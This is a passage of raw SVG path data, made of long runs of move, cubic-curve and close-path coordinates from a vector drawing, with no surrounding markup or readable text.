729.18323,261.62432 731.41564,263.40573 733.19203,265.02821 C 736.95381,268.46407 738.8372,267.58649 736.76168,263.3649 z M 654.93384,207.03541 C 656.13456,206.3928 656.58648,205.28763 656.28768,203.72459 C 655.74182,200.86908 657.37114,199.38987 662.0187,198.52159 C 664.7338,198.01434 666.05689,198.31475 667.81205,199.837 C 669.08508,200.94109 672.93949,202.30658 676.56529,202.93799 C 680.12851,203.55849 684.21374,204.51096 685.64357,205.05459 C 687.47605,205.75129 688.66198,205.6955 689.66203,204.86553 C 691.31008,203.49777 698.0346,202.84478 699.5,203.91021 C 700.05,204.31009 701.74034,204.71408 703.25631,204.80795 C 705.71323,204.9601 706.32807,204.30095 708.91695,198.73932 C 712.58837,190.85209 712.67428,187.38605 709.21986,186.51904 C 707.82828,186.16978 706.42203,186.31374 706.09486,186.83895 C 705.10826,188.42274 701.69414,188.53975 698.2491,187.10783 C 695.67193,186.03664 694.69184,186.01086 693.51999,186.98341 C 692.44506,187.87552 691.25045,187.93435 689.14121,187.19907 C 686.83114,186.39378 685.88637,186.52506 684.50042,187.84396 C 683.20676,189.07505 682.86924,189.1369 683.1851,188.085 C 683.6256,186.61805 678.80194,181 677.10192,181 C 676.05947,181 676.26949,177.60575 677.49131,174.70687 C 678.44908,172.43447 678.06544,172.08499 674.10722,171.62413 C 671.79258,171.35463 671.01992,171.60952 671.3718,172.5265 C 672.11222,174.45601 670.9705,175.05458 668.78287,173.8838 C 665.52298,172.13915 665.84705,173.42117 669.69796,177.50386 C 672.36871,180.33535 672.97028,181.50991 671.92774,181.85742 C 671.14248,182.11917 670.48894,182.14583 670.47542,181.91667 C 670.4619,181.6875 669.73078,182.17263 668.85072,182.99474 C 667.97065,183.81684 667.46736,185.05434 667.73229,185.74474 C 668.01311,186.47656 667.43961,186.99361 666.35699,186.98469 C 664.05125,186.96567 661.5,185.41705 661.5,184.03647 C 661.5,183.46641 661.05,182.96173 660.5,182.91496 C 658.71076,182.76281 657.10681,180.88523 657.62112,179.54496 C 657.89735,178.82512 657.00265,177.02688 655.63289,175.54889 C 654.0964,173.89099 653.2109,171.83724 653.32121,170.18734 C 653.46465,168.04186 652.80793,167.17626 650,165.80977 C 648.075,164.87295 646.05,163.74502 645.5,163.30324 C 644.95,162.86146 643.2625,161.86146 641.75,161.08102 C 640.2375,160.30058 638.99311,159.40058 638.98469,159.08102 C 638.97627,158.76146 638.56056,157.85394 638.0609,157.0643 C 637.31111,155.87938 636.87918,155.85538 635.58805,156.92693 C 634.28529,158.00812 633.92017,157.95555 633.40484,156.61262 C 632.52671,154.32424 630.45482,154.61218 630.27133,157.0481 C 630.17426,158.33676 631.01524,159.50545 632.5393,160.19986 C 633.87154,160.80687 635.20386,162.06693 635.5,163 C 636.01098,164.60997 639.94812,167 642.08926,167 C 642.63659,167 643.62792,167.47668 644.29221,168.0593 C 644.95649,168.64191 647.02258,170.02183 648.88351,171.12579 C 651.19666,172.49802 651.9424,173.4576 651.24087,174.15913 C 650.53934,174.86066 649.52097,174.814 648.02171,174.01162 C 645.40147,172.60931 644.23789,173.37678 645.91692,175.39989 C 646.87969,176.55996 646.67319,177.36065 644.87908,179.42406 C 643.64722,180.84083 641.99734,182 641.21268,182 C 640.33977,182 640.01508,182.59691 640.37615,183.53785 C 641.34704,186.06795 638.49138,186.27384 633.5637,184.02902 C 628.11926,181.54879 628.35178,180.21838 634.25314,180.08435 C 640.80157,179.93563 641.95357,179.73389 641.39699,178.83333 C 641.11373,178.375 641.37436,178 641.97617,178 C 642.76049,178 642.76724,177.4336 642,176 C 641.4113,174.9 640.27047,174 639.46482,174 C 638.65917,174 638,173.52344 638,172.94098 C 638,172.35852 637.60099,172.12857 637.11331,172.42997 C 636.62563,172.73138 635.67053,172.30793 634.99086,171.48899 C 634.3112,170.67005 632.97996,170 632.03254,170 C 631.08513,170 629.50588,169.11149 628.5231,168.02553 C 627.54032,166.93957 625.94032,165.79844 624.96753,165.48969 C 623.99474,165.18094 622.92224,163.82631 622.58418,162.47939 C 621.6808,158.88002 618.31512,158.52835 612.35939,161.41104 C 607.95944,163.5407 606.6889,163.75289 603.54118,162.88376 C 599.32204,161.7188 596.91311,162.95174 597.67984,165.88372 C 598.02717,167.21189 597.26743,168.04288 594.82661,169.00451 C 592.99697,169.72535 590.05243,171.66803 588.28317,173.32158 C 585.32584,176.08551 585.20484,176.43323 586.78317,177.63221 C 588.37497,178.84141 588.37746,178.93871 586.81739,178.9682 C 585.89195,178.98569 584.84913,179.9 584.5,181 C 584.15087,182.1 583.27565,183 582.55506,183 C 581.83446,183 580.68469,183.675 580,184.5 C 579.26628,185.38408 577.06028,186.00629 574.62756,186.01531 C 565.90517,186.04767 565.93203,190.02402 574.65754,190.45337 C 577.3209,190.58442 580.175,190.14949 581,189.48685 C 581.825,188.82421 583.625,187.96321 585,187.57352 C 586.375,187.18382 589.075,186.42823 591,185.89442 C 594.09049,185.03743 610.8172,183.79333 621.21414,183.64716 C 625.70496,183.58402 627.11874,184.70879 624.73734,186.45011 C 623.16096,187.60279 623.13857,187.87011 624.52222,189.01844 C 625.89678,190.15922 625.82384,190.55862 623.859,192.65009 L 621.65137,195 L 623.8847,195 C 625.11304,195 625.88183,195.38218 625.59315,195.84929 C 624.80231,197.12888 629.61834,199.36043 631.56149,198.61478 C 633.96032,197.69426 639.88182,200.05227 640.56329,202.19941 C 640.92592,203.34194 642.11518,204.00192 643.81739,204.00526 C 645.29282,204.00816 647.85,204.87527 649.5,205.93217 C 653.16662,208.2808 652.76077,208.1984 654.93384,207.03541 z M 700.00836,193.03114 C 697.89526,191.68838 699.68426,190.37032 704.5,189.72186 C 706.7,189.42562 707.9375,189.40451 707.25,189.67495 C 706.5625,189.9454 706,190.80417 706,191.58333 C 706,192.3625 705.5868,193 705.08179,193 C 704.57677,193 703.56427,193.22027 702.83179,193.4895 C 702.0993,193.75872 700.82876,193.55246 700.00836,193.03114 z M 670.01008,191.10761 C 668.64063,190.72645 667.96614,190.13896 668.51122,189.80208 C 669.91791,188.9327 679,190.08257 679,191.13005 C 679,192.13558 673.65546,192.12224 670.01008,191.10761 z M 590,178 C 590,177.45 590.45,177 591,177 C 591.55,177 592,177.45 592,178 C 592,178.55 591.55,179 591,179 C 590.45,179 590,178.55 590,178 z M 615.70044,178.26631 C 615.45967,177.84484 614.95946,175.81929 614.58886,173.76508 C 614.0445,170.74777 614.19196,170.13643 615.35637,170.58326 C 617.053,171.23432 618.50003,169.42707 617.01631,168.51008 C 615.23543,167.40944 615.92409,164.25311 618.0674,163.69263 C 619.80825,163.23738 620.10148,163.57435 619.92389,165.826 C 619.80789,167.2967 620.03612,169.24949 620.43106,170.16553 C 621.39532,172.40203 620.75,177.49617 619.5,177.51531 C 618.95,177.52373 617.96859,177.86858 617.3191,178.28162 C 616.6696,178.69467 615.9412,178.68778 615.70044,178.26631 z M 594.54271,176.0691 C 593.77659,174.8295 595.73885,173.68581 597.48328,174.35521 C 598.24641,174.64805 599.03892,174.38325 599.24441,173.76677 C 599.46316,173.11051 600.16411,172.98339 600.93545,173.46011 C 601.87981,174.04375 601.33502,174.66025 599.01163,175.63716 C 595.15968,177.25678 595.27014,177.24611 594.54271,176.0691 z M 773.75,185.01365 C 775.59185,184.99353 775.37109,178.07963 773.50574,177.36383 C 772.6839,177.04846 772.26046,176.38758 772.56476,175.89522 C 772.86906,175.40285 772.60927,175 771.98745,175 C 771.36563,175 770.98769,173.9875 771.14758,172.75 C 771.30747,171.5125 771.0748,169.91595 770.63053,169.20211 C 770.18627,168.48828 770.05769,167.29204 770.34481,166.54381 C 770.66856,165.70016 769.94251,164.9514 768.43343,164.57265 C 767.09504,164.23673 766,163.29928 766,162.48942 C 766,161.67956 765.1,160.45489 764,159.76793 C 761.68524,158.32233 761.38787,157 763.37756,157 C 764.13521,157 765.31531,156.325 766,155.5 C 766.68469,154.675 768.04164,154 769.01546,154 C 770.99609,154 772.63272,151.04367 770.71862,150.92349 C 770.04838,150.88141 768.64615,150.68649 767.60257,150.49033 C 765.50717,150.09648 758,153.02472 758,154.2359 C 758,154.65616 756.90532,155 755.56739,155 C 752.71278,155 750.93775,158.72546 753.14299,160.08837 C 753.88934,160.54965 754.3875,161.16846 754.25,161.46353 C 753.17653,163.76707 757.56858,169.853 761.35228,171.30494 C 762.25853,171.6527 763,172.38723 763,172.93723 C 763,173.48723 762.325,173.67821 761.5,173.36163 C 760.46758,172.96545 760,173.42442 760,174.83399 C 760,175.96038 759.55,177.16008 759,177.5 C 758.45,177.83992 758.00043,178.87898 758.00095,179.80902 C 758.0021,181.84935 767.51532,186.17005 770.5,185.48581 C 771.6,185.23364 773.0625,185.02116 773.75,185.01365 z M 685.73097,171.30701 C 684.758,171.05347 683.408,171.07014 682.73097,171.34406 C 682.05394,171.61799 682.85,171.82543 684.5,171.80505 C 686.15,171.78467 686.70394,171.56055 685.73097,171.30701 z M 698.25967,168.0093 C 701.5852,166.04719 709.98334,165.53518 709.99482,167.29384 C 709.99767,167.73045 710.5625,167.99578 711.25,167.88347 C 711.9375,167.77115 713.76679,168.20143 715.3151,168.83963 C 718.61597,170.20023 728.8795,170.36227 730.89572,169.08561 C 732.62143,167.9929 731.66879,165.18453 729.27268,164.30094 C 728.29771,163.9414 726.15,162.66568 724.5,161.466 C 717.94177,156.69766 715.51087,156.04626 709.84862,157.53993 C 704.64684,158.91214 702.45474,158.69127 703.55802,156.90613 C 703.88287,156.3805 703.77771,156.01489 703.32433,156.09364 C 700.73623,156.54323 699.78807,155.96028 700.90955,154.60898 C 701.83728,153.49114 701.45633,153.00613 698.96983,152.13933 C 695.4859,150.92482 692.38849,152.20062 691.4211,155.24859 C 691.115,156.21303 689.99503,157.46748 688.93228,158.03625 C 687.86952,158.60501 687,159.95453 687,161.03518 C 687,162.11583 686.59814,163 686.10699,163 C 684.69193,163 683.83026,166.23026 684.94735,167.34735 C 685.50445,167.90445 687.8817,168.67288 690.23013,169.05497 C 692.57856,169.43705 694.58678,169.80599 694.69284,169.87483 C 694.7989,169.94368 696.40398,169.10418 698.25967,168.0093 z M 800.72038,157.34713 C 801.68512,156.44157 801.61874,156.06767 800.41092,155.60419 C 799.56519,155.27965 799.15332,154.56095 799.49563,154.00706 C 799.83795,153.45318 799.45328,153 798.6408,153 C 795.90098,153 794.12286,154.15659 794.67013,155.58276 C 794.96925,156.36224 794.71583,157 794.10699,157 C 793.49814,157 792.98632,156.2125 792.96959,155.25 C 792.94127,153.62001 792.86695,153.62418 791.88591,155.31074 C 788.79771,160.61983 795.57055,162.181 800.72038,157.34713 z M 718.46574,153.22869 C 719.29263,151.07385 718.05998,149.84619 715.7922,150.56595 C 714.67048,150.92197 713.24585,151.29043 712.62635,151.38475 C 710.77404,151.66677 708.93566,153.08688 709.41625,153.86449 C 710.26452,155.23702 717.90095,154.7005 718.46574,153.22869 z M 1084,128.94098 C 1084,128.42344 1083.625,128 1083.1667,128 C 1082.7083,128 1082.3333,128.65521 1082.3333,129.45601 C 1082.3333,130.25682 1082.7083,130.68026 1083.1667,130.39699 C 1083.625,130.11373 1084,129.45852 1084,128.94098 z M 635.2724,123.2253 C 636.3635,124.59966 637.22274,124.61432 643,123.35721 C 646.575,122.5793 650.59368,122.13381 651.9304,122.36723 C 656.06729,123.08962 659.95718,120.19438 659.98469,116.37244 C 659.99311,115.20229 660.69548,113.66769 661.54551,112.96223 C 662.39554,112.25677 662.85966,111.07667 662.57689,110.33979 C 662.29413,109.6029 662.5252,109 663.0904,109 C 663.6556,109 663.87466,108.60621 663.57719,108.1249 C 663.27973,107.6436 664.82817,106.96328 667.01818,106.61308 C 669.20818,106.26289 671,105.52311 671,104.96913 C 671,104.41048 669.95062,104.22527 668.64376,104.55328 C 667.23844,104.90599 665.72142,104.57856 664.88483,103.74197 C 664.11335,102.97049 662.92366,102.52545 662.24107,102.75298 C 661.55848,102.98051 660.97407,102.79167 660.94238,102.33333 C 660.9107,101.875 660.71538,99.903531 660.50834,97.952291 C 660.0412,93.549574 660.51179,92.85175 665.5,90.550217 C 667.7,89.535149 670.51215,87.919107 671.74922,86.959011 C 673.65004,85.483779 673.75355,85.119405 672.41744,84.606691 C 668.40191,83.065787 658.988,85.638482 661.94798,87.467853 C 663.36671,88.344675 658.01476,91.979506 655.22583,92.033269 C 653.12117,92.073841 649.69872,94.825909 648.14682,97.725663 C 646.73153,100.37016 646.71006,101 648.03518,101 C 648.60453,101 650.15815,101.71274 651.48766,102.58387 L 653.90496,104.16774 L 651.70248,106.45205 C 650.49111,107.70842 649.25351,108.60037 648.95225,108.43416 C 648.10284,107.96553 646.62115,109.28297 645.26463,111.713 C 644.18736,113.64279 644.2424,113.84421 645.69466,113.28693 C 647.2309,112.69742 647.22827,112.836 645.66077,115.07393 C 643.90914,117.57474 643.71192,117.6644 639.5,117.875 C 638.02493,117.94875 637,118.60209 637,119.46862 C 637,120.36321 637.58629,120.71225 638.5,120.36163 C 639.325,120.04504 640,120.28417 640,120.89301 C 640,122.17799 639.88964,122.18146 634.17253,121.07656 C 630.83158,120.43087 629.72434,120.55479 629.31554,121.62011 C 629.0243,122.37905 628.15917,123 627.39301,123 C 626.62686,123 626,123.4138 626,123.91955 C 626,124.42531 627.81008,124.12809 630.0224,123.25906 C 633.6491,121.83446 634.16557,121.83114 635.2724,123.2253 z M 649.18689,113.25 C 649.37443,112.26606 650.61032,111.35273 652.01022,111.16358 L 654.5,110.82716 L 652.29181,112.91358 C 649.59779,115.45905 648.74832,115.55109 649.18689,113.25 z M 656,104 C 655.20686,103.50981 654.88989,102.77678 655.29563,102.37104 C 655.70137,101.9653 656.55833,102.15833 657.2,102.8 C 658.71091,104.31091 657.86759,105.15423 656,104 z M 624.49292,118.01145 C 624.84326,117.44459 624.44186,117.27695 623.55194,117.61844 C 621.81952,118.28323 621.50255,119 622.94098,119 C 623.45852,119 624.1569,118.55515 624.49292,118.01145 z M 670.81311,112.25 C 670.62966,111.2875 669.47167,110.3562 668.23978,110.18045 C 665.77789,109.82921 665.33784,110.93784 667.2,112.8 C 668.99145,114.59145 671.19543,114.25595 670.81311,112.25 z M 687.18307,103.86569 C 688.15366,103.25024 687.97402,102.99482 686.5,102.89448 C 681.75174,102.57125 673.07935,103.62577 672.02391,104.65471 C 671.16972,105.48745 685.82876,104.72447 687.18307,103.86569 z M 1162,96.531385 C 1162,95.639301 1161.4134,95.287868 1160.5057,95.63617 C 1159.6839,95.95154 1159.2605,96.612416 1159.5648,97.104785 C 1160.4374,98.516708 1162,98.148774 1162,96.531385 z M 858.5,74 C 858.16008,73.45 857.34602,73.006891 856.69098,73.015313 C 855.97537,73.024514 856.09871,73.41754 857,74 C 858.92112,75.241525 859.2673,75.241525 858.5,74 z M 878.73075,65.075656 C 878.61562,63.54736 878.21679,63.348791 876.79289,64.110839 C 874.61956,65.273971 874.41135,66.163115 876.5,65.361626 C 877.325,65.045044 878,65.284167 878,65.893011 C 878,66.501855 878.19703,67 878.43785,67 C 878.67867,67 878.81047,66.134045 878.73075,65.075656 z M 976.5,54 C 976.83992,53.45 976.66803,53 976.11803,53 C 975.56803,53 974.83992,53.45 974.5,54 C 974.16008,54.55 974.33197,55 974.88197,55 C 975.43197,55 976.16008,54.55 976.5,54 z M 742.25,403.96969 C 741.0125,403.47181 739.98025,402.26245 739.95611,401.28222 C 739.93197,400.302 739.26869,397.7 738.48215,395.5 C 737.13052,391.71938 737.18103,391.31817 739.40312,388.18464 C 741.46441,385.27788 741.63109,384.38442 740.75556,380.93512 C 739.43695,375.74018 741.03911,371.89646 745.27474,370.09324 C 749.0989,368.46519 754,364.13606 754,362.38623 C 754,361.70446 754.78669,360.99515 755.7482,360.80997 C 756.70972,360.6248 757.49722,359.61805 757.4982,358.57274 C 757.50334,353.14023 762.64527,359.94007 763.11458,366 C 763.36877,369.28216 762.03195,374 760.84776,374 C 760.33327,374 760.02062,374.5625 760.15297,375.25 C 760.28533,375.9375 758.47234,382.41629 756.1241,389.64732 C 752.5787,400.56483 751.48531,402.87505 749.67729,403.26873 C 748.47978,403.52947 746.825,403.99754 746,404.30887 C 745.175,404.62021 743.4875,404.46758 742.25,403.96969 z M 1168.5,391.83574 C 1165.8813,390.39097 1161,385.84118 1161,384.84513 C 1161,384.41576 1161.7875,384.38745 1162.75,384.78222 C 1165.3468,385.84734 1172.9182,391.38408 1172.962,392.25 C 1173.0164,393.32462 1170.8308,393.1217 1168.5,391.83574 z M 1175,390 C 1175,389.45 1175.45,389 1176,389 C 1176.55,389 1177,389.45 1177,390 C 1177,390.55 1176.55,391 1176,391 C 1175.45,391 1175,390.55 1175,390 z M 780.45888,388.93347 C 780.09635,388.34688 780.03985,387.62682 780.33333,387.33333 C 781.04965,386.61702 783,387.87916 783,389.05902 C 783,390.33699 781.27359,390.25169 780.45888,388.93347 z M 1172,388.05902 C 1172,387.54148 1172.45,386.83992 1173,386.5 C 1173.55,386.16008 1174,386.58352 1174,387.44098 C 1174,388.29844 1173.55,389 1173,389 C 1172.45,389 1172,388.57656 1172,388.05902 z M 787.125,386.125 C 787.54325,384.87026 789,384.57891 789,385.75 C 789,386.1625 788.49375,386.66875 787.875,386.875 C 787.25625,387.08125 786.91875,386.74375 787.125,386.125 z M 1180,383.05902 C 1180,382.47656 1180.45,382 1181,382 C 1182.2814,382 1182.2814,382.70806 1181,383.5 C 1180.45,383.83992 1180,383.64148 1180,383.05902 z M 1210.5,381 C 1211.2997,379.70609 1213,379.70609 1213,381 C 1213,381.55 1212.2984,382 1211.441,382 C 1210.5835,382 1210.1601,381.55 1210.5,381 z M 1179,380 C 1179,378.71862 1179.7081,378.71862 1180.5,380 C 1180.8399,380.55 1180.6415,381 1180.059,381 C 1179.4766,381 1179,380.55 1179,380 z M 1208.4815,377.97005 C 1208.0925,377.34068 1208.2273,376.37274 1208.7809,375.81909 C 1210.2015,374.39848 1213.5,375.23347 1213.5,377.0137 C 1213.5,378.81153 1209.4755,379.57845 1208.4815,377.97005 z M 61.582949,377.13421 C 61.152178,376.43721 61.06979,375.59688 61.399864,375.2668 C 62.294825,374.37184 63.270632,375.6881 62.787251,377.13825 C 62.448526,378.15442 62.212984,378.15363 61.582949,377.13421 z M 1176,376 C 1176,375.45 1176.45,375 1177,375 C 1177.55,375 1178,375.45 1178,376 C 1178,376.55 1177.55,377 1177,377 C 1176.45,377 1176,376.55 1176,376 z M 1212.4943,374.16098 C 1211.5262,373.19291 1212.0258,372.22585 1213.75,371.73008 C 1214.7125,371.45334 1216.2875,370.90271 1217.25,370.50646 C 1218.5724,369.96207 1219,370.27316 1219,371.77951 C 1219,373.23083 1218.1825,373.89298 1215.9943,374.21414 C 1214.3412,374.45677 1212.7662,374.43285 1212.4943,374.16098 z M 1174.8371,373.32745 C 1173.1853,372.88984 1169.403,366.2637 1170.2955,365.37117 C 1170.552,365.11465 1171.5237,365.66658 1172.4548,366.5977 C 1173.6652,367.80805 1173.8176,368.49472 1172.9894,369.00658 C 1172.2359,369.47223 1172.5413,369.90828 1173.8628,370.25388 C 1175.2273,370.61071 1176.0129,370.24572 1176.2544,369.14261 C 1176.4523,368.23918 1176.848,368.9625 1177.1339,370.75 C 1177.4197,372.5375 1177.3941,373.9478 1177.0768,373.884 C 1176.7596,373.8202 1175.7517,373.56975 1174.8371,373.32745 z M 1243.4411,362.5318 C 1241.8893,361.35803 1241.8126,361.05723 1243.0589,361.0318 C 1243.9162,361.01431 1245.4912,361.66069 1246.5589,362.4682 C 1248.1107,363.64197 1248.1874,363.94277 1246.9411,363.9682 C 1246.0838,363.98569 1244.5088,363.33931 1243.4411,362.5318 z M 741,357.55902 C 741,357.31648 741.45,356.83992 742,356.5 C 742.55,356.16008 743,356.35852 743,356.94098 C 743,357.52344 742.55,358 742,358 C 741.45,358 741,357.80156 741,357.55902 z M 737.54271,356.0691 C 737.22627,355.5571 737.42472,354.85554 737.98369,354.51008 C 738.54266,354.16462 739,354.58352 739,355.44098 C 739,357.19751 738.39994,357.45614 737.54271,356.0691 z M 1124,355 C 1123.0987,354.41754 1122.9754,354.02451 1123.691,354.01531 C 1124.346,354.00689 1125.1601,354.45 1125.5,355 C 1126.2673,356.24153 1125.9211,356.24153 1124,355 z M 1147,355 C 1147,353.70609 1148.7003,353.70609 1149.5,355 C 1149.8399,355.55 1149.4165,356 1148.559,356 C 1147.7016,356 1147,355.55 1147,355 z M 1018.6439,350.01207 C 1019.4637,348.36871 1020.8917,346.5824 1021.8172,346.04248 C 1023.2052,345.23278 1023.2372,345.03532 1022,344.91525 C 1020.4225,344.76217 1017.5213,345.02058 1015,345.53872 C 1014.175,345.70826 1012.1928,345.88141 1010.595,345.92349 C 1007.7645,345.99804 1007.7359,346.05073 1009.4811,347.97915 C 1011.1733,349.84894 1011.1763,349.99513 1009.5352,350.62487 C 1008.5798,350.99148 1007.5061,350.85554 1007.1491,350.32278 C 1006.7921,349.79001 1005.6,348.97027 1004.5,348.50112 C 1002.542,347.66601 1002.5449,347.64016 1004.6419,347.26867 C 1006.2401,346.98555 1006.6483,346.37116 1006.2501,344.84837 C 1005.7533,342.94876 1006.0689,342.8406 1010.8097,343.28563 C 1013.6109,343.5486 1016.1201,343.54658 1016.3855,343.28115 C 1017.292,342.37464 1026,342.22132 1026,343.11187 C 1026,343.60034 1026.7875,343.99311 1027.75,343.98469 C 1029.1407,343.97252 1029.2156,343.78929 1028.1149,343.09217 C 1026.9994,342.38568 1027.1197,342.0063 1028.7334,341.14267 C 1031.0871,339.883 1032.4393,340.76571 1030.9342,342.57932 C 1030.1267,343.55232 1030.3944,343.70962 1032.0992,343.2638 C 1035.8424,342.28495 1033.3426,344.73368 1029.2361,346.06848 C 1027.1812,346.7364 1025.1571,347.86398 1024.7379,348.57422 C 1024.1267,349.61 1018.5237,353 1017.423,353 C 1017.2747,353 1017.824,351.65543 1018.6439,350.01207 z M 1152.4589,351.93347 C 1152.0963,351.34688 1152.0504,350.61628 1152.3567,350.30993 C 1153.1794,349.48729 1156,350.77145 1156,351.96862 C 1156,353.32587 1153.3029,353.2991 1152.4589,351.93347 z M 1167.5,352 C 1168.2997,350.70609 1170,350.70609 1170,352 C 1170,352.55 1169.2984,353 1168.441,353 C 1167.5835,353 1167.1601,352.55 1167.5,352 z M 1111.8643,351.53094 C 1111.6063,351.27296 1109.9197,350.94945 1108.1162,350.81203 C 1105.7797,350.63399 1103.8619,349.4827 1101.4442,346.80657 C 1097.3583,342.28393 1093.979,341.20086 1090.8318,343.40523 C 1089.5796,344.28235 1088.9926,345.01431 1089.5275,345.0318 C 1090.0624,345.0493 1089.6963,345.67325 1088.714,346.41837 C 1086.6497,347.98422 1080.8981,347.07035 1078.1769,344.74416 C 1077.1293,343.84866 1075.0926,343.4653 1072.75,343.72268 C 1068.825,344.15392 1067.9604,343.10769 1070.5,341 C 1072.5222,339.32173 1072.3884,337.76349 1069.9567,334.67204 C 1068.7256,333.10695 1066.4399,331.8035 1064.2067,331.39294 C 1062.168,331.01816 1060.222,330.28357 1059.8821,329.76053 C 1059.5423,329.23748 1057.6318,328.76326 1055.6367,328.70671 C 1053.0788,328.6342 1051.8404,328.07252 1051.4371,326.80194 C 1051.1226,325.81087 1050.4955,325 1050.0437,325 C 1049.5919,325 1049.2847,324.23164 1049.3611,323.29253 C 1049.4389,322.33676 1048.2893,320.992 1046.75,320.23796 C 1043.5974,318.69366 1043.219,317.35075 1045.75,316.68933 C 1047.0669,316.34518 1046.9432,316.20329 1045.25,316.116 C 1042.1606,315.95672 1042.3918,314 1045.5,314 C 1046.875,314 1048,314.40787 1048,314.90638 C 1048,315.40489 1048.9031,315.57659 1050.0069,315.28793 C 1051.1108,314.99928 1053.3238,315.30571 1054.9249,315.96889 C 1057.2405,316.92805 1057.7464,317.66812 1057.3984,319.58733 C 1057.1578,320.9143 1057.3894,322 1057.9131,322 C 1058.4367,322 1059.1509,322.9 1059.5,324 C 1060.317,326.57414 1061.6387,326.54358 1063.0439,323.91804 C 1063.9338,322.25518 1063.8289,321.59538 1062.5228,320.64033 C 1061.1828,319.6605 1061.8457,319.46145 1066.1938,319.53799 C 1069.1122,319.58936 1072.4,320.1051 1073.5,320.68407 C 1074.6,321.26304 1077.1682,322.03775 1079.2071,322.40565 C 1082.591,323.01621 1089.0497,325.43686 1094.7334,328.22473 C 1095.9618,328.82725 1097.2378,330.17395 1097.569,331.2174 C 1098.2764,333.44633 1103.2608,335.71757 1103.8125,334.06239 C 1104.0073,333.47808 1105.8917,333 1108,333 C 1110.1295,333 1112.0588,332.4444 1112.3405,331.75 C 1112.7328,330.78331 1113.0663,330.81235 1113.8121,331.87812 C 1114.9322,333.47888 1117,332.5467 1117,330.44098 C 1117,329.64844 1117.675,329 1118.5,329 C 1119.325,329 1120,328.60175 1120,328.11501 C 1120,326.90871 1115.4303,324 1113.5352,324 C 1112.6908,324 1112,323.55 1112,323 C 1112,321.71745 1112.1131,321.72901 1116.1279,323.42201 C 1120.7711,325.38005 1124.0669,328.66214 1123.3267,330.591 C 1122.8392,331.86155 1122.5575,331.9087 1121.8761,330.83385 C 1121.2431,329.83513 1121.0268,329.81406 1121.0153,330.75 C 1120.988,332.98249 1120.6285,333.47957 1118.0451,334.85695 C 1114.4852,336.75495 1109.8489,336.9918 1108.2162,335.35906 C 1106.5732,333.71601 1104.6334,334.60232 1105.415,336.639 C 1105.7182,337.42919 1105.3273,338.32092 1104.5463,338.62061 C 1102.8482,339.27224 1103.6499,342 1105.5396,342 C 1106.2687,342 1107.1529,342.90653 1107.5046,344.01452 C 1107.8563,345.12251 1108.5608,345.77146 1109.0702,345.45663 C 1109.5796,345.14181 1111.1783,346.14777 1112.6229,347.69211 C 1114.0676,349.23645 1114.6793,349.70163 1113.9823,348.72583 C 1112.1781,346.19997 1113.2924,345.6517 1115.8036,347.8297 C 1117.4193,349.23097 1117.6492,349.95076 1116.764,350.83604 C 1115.5961,352.00387 1112.742,352.40866 1111.8643,351.53094 z M 1147.75,349.25074 C 1146.7875,349.03218 1146,348.25348 1146,347.5203 C 1146,346.67613 1146.7392,346.38055 1148.0156,346.71433 C 1151.7642,347.69462 1151.5119,350.10498 1147.75,349.25074 z M 1151.2777,347.75 C 1149.7743,345.80709 1148.9698,343 1149.9164,343 C 1150.7376,343 1154,347.36579 1154,348.46482 C 1154,349.46502 1152.2489,349.00524 1151.2777,347.75 z M 1121,346 C 1121,344.70609 1122.7003,344.70609 1123.5,346 C 1123.8399,346.55 1123.4165,347 1122.559,347 C 1121.7016,347 1121,346.55 1121,346 z M 1137.7495,343.61725 C 1135.1041,341.50788 1133.8388,339.1643 1136.0998,340.56166 C 1136.8727,341.03937 1136.8623,340.61115 1136.0646,339.12068 C 1134.6296,336.43944 1136.1161,336.36578 1138.5,339 C 1139.7006,340.32667 1139.8838,341 1139.0442,341 C 1138.348,341 1138.8013,341.8283 1140.0515,342.84066 C 1141.3018,343.85302 1141.9139,344.93518 1141.4118,345.24547 C 1140.9098,345.55576 1139.2617,344.82306 1137.7495,343.61725 z M 1144.75,343.42803 C 1143.2375,342.60748 1142,341.52143 1142,341.01457 C 1142,340.50772 1143.3472,340.85959 1144.9937,341.79651 C 1146.6402,342.73343 1147.9902,343.8375 1147.9937,344.25 C 1148.0017,345.19988 1148.0286,345.20671 1144.75,343.42803 z M 1046.1545,341.44803 C 1046.3445,340.46777 1047.1055,339.46412 1047.8455,339.2177 C 1048.7061,338.93112 1049.0665,339.41195 1048.8455,340.55197 C 1048.6555,341.53223 1047.8945,342.53588 1047.1545,342.7823 C 1046.2939,343.06888 1045.9335,342.58805 1046.1545,341.44803 z M 1056,337.12244 C 1056,336.08979 1056.6697,334.68911 1057.4882,334.00982 C 1058.694,333.00908 1059.0947,333.08313 1059.6,334.40011 C 1060.2323,336.04778 1058.485,339 1056.8776,339 C 1056.3949,339 1056,338.1551 1056,337.12244 z M 1131.3997,338.23469 C 1130.0259,337.31735 1128,333.542 1128,331.89907 C 1128,330.294 1133.9358,336.10921 1133.9722,337.75 C 1134.0034,339.15152 1133.0436,339.33235 1131.3997,338.23469 z M 1008.5162,336.05103 C 1008.1419,334.87182 1007.3254,334.32164 1006.4488,334.65802 C 1005.3287,335.08786 1005,334.28231 1005,331.10699 C 1005,328.84814 1004.55,327 1004,327 C 1002.6072,327 1002.7465,325.08409 1004.5915,318.86483 C 1006.5678,312.20296 1007.5103,310.43057 1008.9069,310.75 C 1009.5081,310.8875 1010,310.5798 1010,310.06622 C 1010,309.18679 1010.9072,309.23456 1018.6115,310.51965 C 1020.6894,310.86625 1022.1419,310.53393 1022.984,309.51933 C 1023.6775,308.6837 1024.6398,308 1025.1224,308 C 1026.6115,308 1026.0958,309.90418 1024.0537,311.94632 C 1022.3616,313.63843 1021.1861,313.8154 1015.0537,313.30128 C 1008.8254,312.77912 1008,312.91078 1008,314.42639 C 1008,315.37045 1008.6468,316.78961 1009.4372,317.58009 C 1010.6869,318.82973 1011.092,318.72251 1012.5409,316.75866 C 1013.4795,315.4866 1014.3958,314.98252 1014.6386,315.60466 C 1014.8757,316.21222 1016.1791,316.49726 1017.5349,316.23808 C 1019.509,315.86071 1020,316.17667 1020,317.82441 C 1020,320.13969 1018.4538,321.5432 1017.5371,320.05999 C 1016.7385,318.76792 1014,319.87087 1014,321.48454 C 1014,322.18336 1014.67,323.3112 1015.489,323.99086 C 1016.3079,324.67053 1016.7294,325.6288 1016.4256,326.12037 C 1016.1218,326.61194 1016.5768,327.28409 1017.4366,327.61405 C 1019.1269,328.26269 1019.4956,331.66949 1018.1119,333.85325 C 1016.8735,335.80751 1013.1959,333.62862 1012.4034,330.47114 C 1012.0623,329.11201 1011.3338,328 1010.7846,328 C 1010.2354,328 1010.0395,327.33941 1010.3493,326.53203 C 